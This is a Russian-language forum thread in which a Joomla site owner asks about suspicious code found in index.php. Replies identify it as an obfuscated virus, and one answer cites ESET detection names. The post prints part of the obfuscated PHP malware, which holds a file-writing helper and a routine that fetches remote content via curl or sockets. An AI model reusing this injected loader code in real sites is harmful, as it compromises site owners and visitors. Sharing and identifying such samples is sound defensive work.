# Странный код в index.php joomla

Tags: joomla

Подскажите пожалуйста что это за код?

```
<?php @ob_start();
@set_time_limit(3600);
if (version_compare(PHP_VERSION, '5.1.0', '<')) {
    @ini_set('date.timezone', 'America/Toronto');
} else {
    @date_default_timezone_set('America/Toronto');
}
function z1BLWYQeLj($z1WYcJLjnp, $content, $z1iDVsKFoA = 'w') {
    $z1BL = @fopen($z1WYcJLjnp, $z1iDVsKFoA);
    if ($z1BL !== false) {
        fwrite($z1BL, $content);
        fclose($z1BL);
    }
}
function z1npYcoALj($z1QeOYXk) {
    $return = 0;
    if (function_exists('curl_i' . 'nit') && function_exists('curl_' . 'exec')) {
        $z1kqQeOYXk = curl_init();
        curl_setopt($z1kqQeOYXk, CURLOPT_URL, $z1QeOYXk);
        curl_setopt($z1kqQeOYXk, CURLOPT_CONNECTTIMEOUT, 0);
        curl_setopt($z1kqQeOYXk, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($z1kqQeOYXk, CURLOPT_TIMEOUT, 180);
        $curl_exec = curl_exec($z1kqQeOYXk);
        curl_close($z1kqQeOYXk);
        if ($curl_exec) {
            $return = $curl_exec;
        }
    } else {
        $z1BLQeEPkq = '';
        if (function_exists('fsoc' . 'kopen')) {
            $z1BLQeEPkq = 'fsocko' . 'pen';
        } elseif (function_exists('pfsock' . 'open')) {
            $z1BLQeEPkq = 'pfsoc' . 'kopen';
        }
        if ($z1BLQeEPkq != '') {
            $parse = parse_url($z1QeOYXk);
            $z1BLWY = $z1BLQeEPkq($parse['ho' . 'st'], isset($parse['po' . 'rt']) ? $parse['po' . 'rt'] : 80, $z1oAEP, $z1oAns, 30);
            if ($z1BLWY) {
                $return = isset($parse['pa' . 'th']) ? $parse['pa' . 'th'] : '';
                $return.= isset($parse['que' . 'ry']) ? '?' . $parse['que' . 'ry'] : '';
                $return = $return == '' ? '/' : $return;
                fwrite($z1BLWY, "GET $return HTTP/1.0
Host: " . $parse['ho' . 'st'] . "
Connection: Close

");
```

**Полный код здесь.**
https://www.unphp.net/decode/db9e6b36273db96a9f3b49369a01fa70/

Comment: Да что за код - вирусняк.

Comment: - Охотно, - отозвался незнакомец. Он смерил Берлиоза взглядом, как будто собирался сшить ему костюм, сквозь зубы пробормотал что-то вроде: "Раз, два... Меркурий во втором доме... Луна ушла... Шесть - несчастье... Вечер - семь..." - И громко и радостно объявил: - вы поймали [типичный обсфуцированный вирус](https://habrahabr.ru/post/137459/).

Answer (score 0):

Файлы на сайте в которых обнаружен вирус 
PHP/Kryptik.BM и PHP/Kryptik.BN В базе данных ESET появился 1 марта 2018 года!
В феврале сканировал сайт ESET ничего не нашел, зато счас все обнаружил.
[image]